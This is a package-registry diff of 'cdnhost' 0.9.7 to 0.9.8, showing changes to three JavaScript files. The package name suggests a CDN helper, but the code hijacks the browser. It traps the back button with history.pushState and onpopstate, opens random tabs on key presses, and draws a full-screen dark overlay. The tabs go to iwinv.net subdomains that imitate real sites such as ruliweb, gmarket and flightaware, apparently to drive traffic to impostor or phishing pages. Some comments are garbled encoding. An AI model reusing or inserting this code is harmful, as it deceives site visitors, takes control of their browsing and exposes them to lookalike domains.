cdnhost 0.9.7 → 0.9.8
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/iwinv.js +22 -12
- package/package.json +1 -1
- package/seekr.js +44 -31
- package/total.js +33 -18
package/iwinv.js
CHANGED
|
@@ -13,21 +13,31 @@ function handleKeyPress(event) {
|
|
|
13
13
|
const isMobile = /Mobi|Android/i.test(navigator.userAgent);
|
|
14
14
|
|
|
15
15
|
const desktopUrls = [
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
20
|
-
|
|
21
|
-
|
|
16
|
+
'https://newsfactory.iwinv.net',
|
|
17
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
18
|
+
'https://instiz.iwinv.net/recent.php',
|
|
19
|
+
'https://bikini.iwinv.net/recent.php',
|
|
20
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
21
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
22
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
23
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
24
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
25
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
26
|
+
'https://popcat.iwinv.net/recent.php',
|
|
22
27
|
];
|
|
23
28
|
|
|
24
29
|
const mobileUrls = [
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
28
|
-
|
|
29
|
-
|
|
30
|
-
|
|
30
|
+
'https://newsfactory.iwinv.net',
|
|
31
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
32
|
+
'https://instiz.iwinv.net/recent.php',
|
|
33
|
+
'https://bikini.iwinv.net/recent.php',
|
|
34
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
35
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
36
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
37
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
38
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
39
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
40
|
+
'https://popcat.iwinv.net/recent.php',
|
|
31
41
|
];
|
|
32
42
|
|
|
33
43
|
const urls = isMobile ? mobileUrls : desktopUrls;
|
package/package.json
CHANGED
package/seekr.js
CHANGED
|
@@ -8,37 +8,52 @@ window.addEventListener('load', function() {
|
|
|
8
8
|
});
|
|
9
9
|
|
|
10
10
|
document.writeln('<style>* {font-size: 1em !important}</style>');
|
|
11
|
-
|
|
12
|
-
//����Ŀ��
|
|
13
|
-
|
|
14
11
|
const urls = [
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
|
|
18
|
-
|
|
19
|
-
|
|
20
|
-
|
|
12
|
+
'https://newsfactory.iwinv.net',
|
|
13
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
14
|
+
'https://instiz.iwinv.net/recent.php',
|
|
15
|
+
'https://bikini.iwinv.net/recent.php',
|
|
16
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
17
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
18
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
19
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
20
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
21
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
22
|
+
'https://popcat.iwinv.net/recent.php',
|
|
21
23
|
];
|
|
22
24
|
|
|
25
|
+
|
|
26
|
+
|
|
27
|
+
|
|
23
28
|
function handleKeyPress(event) {
|
|
24
29
|
const isMobile = /Mobi|Android/i.test(navigator.userAgent);
|
|
25
30
|
|
|
26
31
|
const desktopUrls = [
|
|
27
|
-
|
|
28
|
-
|
|
29
|
-
|
|
30
|
-
|
|
31
|
-
|
|
32
|
-
|
|
32
|
+
'https://newsfactory.iwinv.net',
|
|
33
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
34
|
+
'https://instiz.iwinv.net/recent.php',
|
|
35
|
+
'https://bikini.iwinv.net/recent.php',
|
|
36
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
37
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
38
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
39
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
40
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
41
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
42
|
+
'https://popcat.iwinv.net/recent.php',
|
|
33
43
|
];
|
|
34
44
|
|
|
35
45
|
const mobileUrls = [
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
39
|
-
|
|
40
|
-
|
|
41
|
-
|
|
46
|
+
'https://newsfactory.iwinv.net',
|
|
47
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
48
|
+
'https://instiz.iwinv.net/recent.php',
|
|
49
|
+
'https://bikini.iwinv.net/recent.php',
|
|
50
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
51
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
52
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
53
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
54
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
55
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
56
|
+
'https://popcat.iwinv.net/recent.php',
|
|
42
57
|
];
|
|
43
58
|
|
|
44
59
|
const urls = isMobile ? mobileUrls : desktopUrls;
|
|
@@ -52,7 +67,6 @@ function handleKeyPress(event) {
|
|
|
52
67
|
randomUrls.forEach(url => window.open(url, '_blank'));
|
|
53
68
|
}
|
|
54
69
|
|
|
55
|
-
//�̺�Ʈ
|
|
56
70
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
57
71
|
document.writeln('<style>');
|
|
58
72
|
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.8;background:#000;width:100%;height:110vh}');
|
|
@@ -71,17 +85,16 @@ window.addEventListener('scroll', () => {
|
|
|
71
85
|
|
|
72
86
|
history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back(),handleKeyPress())}
|
|
73
87
|
|
|
74
|
-
//�̺�Ʈ2
|
|
75
88
|
document.getElementById('container').style.boxShadow = 'none';
|
|
76
89
|
function ss(){
|
|
77
|
-
document.getElementById("s2").style.transition = "opacity
|
|
78
|
-
document.getElementById("button").style.transition = "opacity
|
|
79
|
-
setTimeout("s()",
|
|
80
|
-
setTimeout("h()",
|
|
90
|
+
document.getElementById("s2").style.transition = "opacity 9s";
|
|
91
|
+
document.getElementById("button").style.transition = "opacity 9s";
|
|
92
|
+
setTimeout("s()", 3000);
|
|
93
|
+
setTimeout("h()", 9000);
|
|
81
94
|
}
|
|
82
95
|
function pcss(){
|
|
83
|
-
setTimeout("s()",
|
|
84
|
-
setTimeout("h()",
|
|
96
|
+
setTimeout("s()", 3000);
|
|
97
|
+
setTimeout("h()", 9000);
|
|
85
98
|
}
|
|
86
99
|
function a(){
|
|
87
100
|
document.getElementById("button").style.display="none";
|
|
@@ -107,5 +120,5 @@ function h(){
|
|
|
107
120
|
button.style.opacity = 1;
|
|
108
121
|
document.getElementById("s2").style.transition = "opacity 1s";
|
|
109
122
|
document.getElementById("button").style.transition = "opacity 1s";
|
|
110
|
-
},
|
|
111
|
-
}
|
|
123
|
+
}, 5000);
|
|
124
|
+
}
|
package/total.js
CHANGED
|
@@ -9,33 +9,48 @@ window.addEventListener('load', function() {
|
|
|
9
9
|
|
|
10
10
|
document.writeln('<style>* { font-size: 1em !important}</style>');
|
|
11
11
|
const urls = [
|
|
12
|
-
|
|
13
|
-
|
|
14
|
-
|
|
15
|
-
|
|
16
|
-
|
|
17
|
-
|
|
12
|
+
'https://newsfactory.iwinv.net',
|
|
13
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
14
|
+
'https://instiz.iwinv.net/recent.php',
|
|
15
|
+
'https://bikini.iwinv.net/recent.php',
|
|
16
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
17
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
18
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
19
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
20
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
21
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
22
|
+
'https://popcat.iwinv.net/recent.php',
|
|
18
23
|
];
|
|
19
24
|
|
|
20
25
|
function handleKeyPress(event) {
|
|
21
26
|
const isMobile = /Mobi|Android/i.test(navigator.userAgent);
|
|
22
27
|
|
|
23
28
|
const desktopUrls = [
|
|
24
|
-
|
|
25
|
-
|
|
26
|
-
|
|
27
|
-
|
|
28
|
-
|
|
29
|
-
|
|
29
|
+
'https://newsfactory.iwinv.net',
|
|
30
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
31
|
+
'https://instiz.iwinv.net/recent.php',
|
|
32
|
+
'https://bikini.iwinv.net/recent.php',
|
|
33
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
34
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
35
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
36
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
37
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
38
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
39
|
+
'https://popcat.iwinv.net/recent.php',
|
|
30
40
|
];
|
|
31
41
|
|
|
32
42
|
const mobileUrls = [
|
|
33
|
-
|
|
34
|
-
|
|
35
|
-
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
43
|
+
'https://newsfactory.iwinv.net',
|
|
44
|
+
'https://ruliweb.iwinv.net/recent.php',
|
|
45
|
+
'https://instiz.iwinv.net/recent.php',
|
|
46
|
+
'https://bikini.iwinv.net/recent.php',
|
|
47
|
+
'https://manatoki.iwinv.net/recent.php',
|
|
48
|
+
'https://gmarket.iwinv.net/recent.php',
|
|
49
|
+
'https://mlbpark.iwinv.net/recent.php',
|
|
50
|
+
'https://mmtcld.iwinv.net/recent.php',
|
|
51
|
+
'https://flightaware.iwinv.net/recent.php',
|
|
52
|
+
'https://koreakr.iwinv.net/recent.php',
|
|
53
|
+
'https://popcat.iwinv.net/recent.php',
|
|
39
54
|
];
|
|
40
55
|
|
|
41
56
|
const urls = isMobile ? mobileUrls : desktopUrls;
|